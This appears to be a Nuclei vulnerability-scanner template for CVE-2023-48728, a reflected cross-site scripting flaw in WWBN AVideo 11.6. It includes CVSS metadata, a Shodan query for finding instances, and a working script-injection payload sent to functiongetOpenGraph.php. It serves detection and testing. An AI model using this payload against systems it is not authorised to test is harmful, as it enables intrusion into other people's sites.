44 lines
1.6 KiB
YAML
44 lines
1.6 KiB
YAML
id: CVE-2023-48728
|
|
|
|
info:
|
|
name: WWBN AVideo 11.6 - Cross-Site Scripting
|
|
author: ritikchaddha
|
|
severity: medium
|
|
description: |
|
|
A reflected XSS vulnerability exists in the functiongetOpenGraph videoName functionality of WWBN AVideo 11.6 and dev master commit 3c6bb3ff, allowing arbitrary Javascript execution.
|
|
impact: |
|
|
Successful exploitation could lead to unauthorized access to sensitive information or account takeover.
|
|
remediation: |
|
|
Sanitize and validate user input to prevent XSS attacks.
|
|
reference:
|
|
- https://talosintelligence.com/vulnerability_reports/TALOS-2023-1883
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-48728
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-48728
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00125
|
|
epss-percentile: 0.46326
|
|
cpe: cpe:2.3:a:wwbn:avideo:3c6bb3ff:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: wwbn
|
|
product: avideo
|
|
shodan-query: html:"AVideo"
|
|
tags: cve,cve2023,avideo,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/objects/functiongetOpenGraph.php?videoName=123+--><script>alert(document.domain)</script>"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body, "<script>alert(document.domain)</script>", "OpenGraph no video")'
|
|
- 'status_code == 200 || status_code == 500'
|
|
- 'contains(header, "text/html")'
|
|
condition: and
|
|
# digest: 4b0a00483046022100b3f243978a7668c139e66d6a06da1195e871eb3b208bd63d318d18a23c4340b8022100bce3df29ca987ce9097f1da4dd2fb477455648ed5ec4068c7958bed3c28de820:922c64590222798bb761d5b6d8e72950 |